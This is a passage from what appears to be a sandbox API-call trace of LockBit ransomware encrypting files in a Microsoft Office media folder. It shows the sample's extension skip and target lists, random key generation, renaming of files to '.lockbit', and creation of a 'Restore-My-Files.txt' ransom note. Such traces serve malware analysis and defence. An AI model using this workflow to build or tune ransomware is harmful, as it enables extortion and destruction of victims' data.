lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0299587.WMF") returned 1 [0199.283] lstrcmpiW (lpString1="ntldr", lpString2="J0299587.WMF") returned 1 [0199.283] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0299587.WMF") returned 1 [0199.283] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0299587.WMF") returned -1 [0199.283] lstrcmpiW (lpString1="autorun.inf", lpString2="J0299587.WMF") returned -1 [0199.283] lstrcmpiW (lpString1="thumbs.db", lpString2="J0299587.WMF") returned 1 [0199.283] lstrcmpiW (lpString1="iconcache.db", lpString2="J0299587.WMF") returned -1 [0199.283] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF") returned=".WMF" [0199.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.284] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.284] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.285] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.285] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF.lockbit") returned 70 [0199.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299587.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.286] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.286] malloc (_Size=0x40068) returned 0x3df0008 [0199.286] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25288) returned 1 [0199.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.287] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.294] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.294] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.294] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.296] free (_Block=0x1fa2ed8) [0199.296] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.296] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.296] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2b9900, ftCreationTime.dwHighDateTime=0x1bf2c9a, ftLastAccessTime.dwLowDateTime=0xbd669c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd2b9900, ftLastWriteTime.dwHighDateTime=0x1bf2c9a, nFileSizeHigh=0x0, nFileSizeLow=0x1310, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0299611.WMF", cAlternateFileName="")) returned 1 [0199.296] lstrcmpiW (lpString1=".", lpString2="J0299611.WMF") returned -1 [0199.296] lstrcmpiW (lpString1="..", lpString2="J0299611.WMF") returned -1 [0199.297] PathFindExtensionW (pszPath="J0299611.WMF") returned=".WMF" [0199.297] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.297] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.298] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.298] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0299611.WMF") returned 1 [0199.298] lstrcmpiW (lpString1="ntldr", lpString2="J0299611.WMF") returned 1 [0199.298] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0299611.WMF") returned 1 [0199.298] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0299611.WMF") returned -1 [0199.298] lstrcmpiW (lpString1="autorun.inf", lpString2="J0299611.WMF") returned -1 [0199.298] lstrcmpiW (lpString1="thumbs.db", lpString2="J0299611.WMF") returned 1 [0199.298] lstrcmpiW (lpString1="iconcache.db", lpString2="J0299611.WMF") returned -1 [0199.298] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.299] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF") returned=".WMF" [0199.299] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.299] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.299] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.300] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.300] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.300] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF.lockbit") returned 70 [0199.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299611.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.302] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.302] malloc (_Size=0x40068) returned 0x3df0008 [0199.302] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4880) returned 1 [0199.302] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.303] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.308] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.308] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.308] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0199.309] free (_Block=0x1fa2ed8) [0199.309] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.309] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.309] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.309] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e1a5400, ftCreationTime.dwHighDateTime=0x1bf2c9b, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5e1a5400, ftLastWriteTime.dwHighDateTime=0x1bf2c9b, nFileSizeHigh=0x0, nFileSizeLow=0x4322, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0299763.WMF", cAlternateFileName="")) returned 1 [0199.309] lstrcmpiW (lpString1=".", lpString2="J0299763.WMF") returned -1 [0199.309] lstrcmpiW (lpString1="..", lpString2="J0299763.WMF") returned -1 [0199.309] PathFindExtensionW (pszPath="J0299763.WMF") returned=".WMF" [0199.309] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.309] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.310] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.310] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0299763.WMF") returned 1 [0199.311] lstrcmpiW (lpString1="ntldr", lpString2="J0299763.WMF") returned 1 [0199.311] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0299763.WMF") returned 1 [0199.311] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0299763.WMF") returned -1 [0199.311] lstrcmpiW (lpString1="autorun.inf", lpString2="J0299763.WMF") returned -1 [0199.311] lstrcmpiW (lpString1="thumbs.db", lpString2="J0299763.WMF") returned 1 [0199.311] lstrcmpiW (lpString1="iconcache.db", lpString2="J0299763.WMF") returned -1 [0199.311] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.311] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF") returned=".WMF" [0199.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.311] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.311] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.312] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.312] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF.lockbit") returned 70 [0199.313] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299763.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.314] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.314] malloc (_Size=0x40068) returned 0x3df0008 [0199.314] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17186) returned 1 [0199.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.315] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.340] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.340] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.340] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.342] free 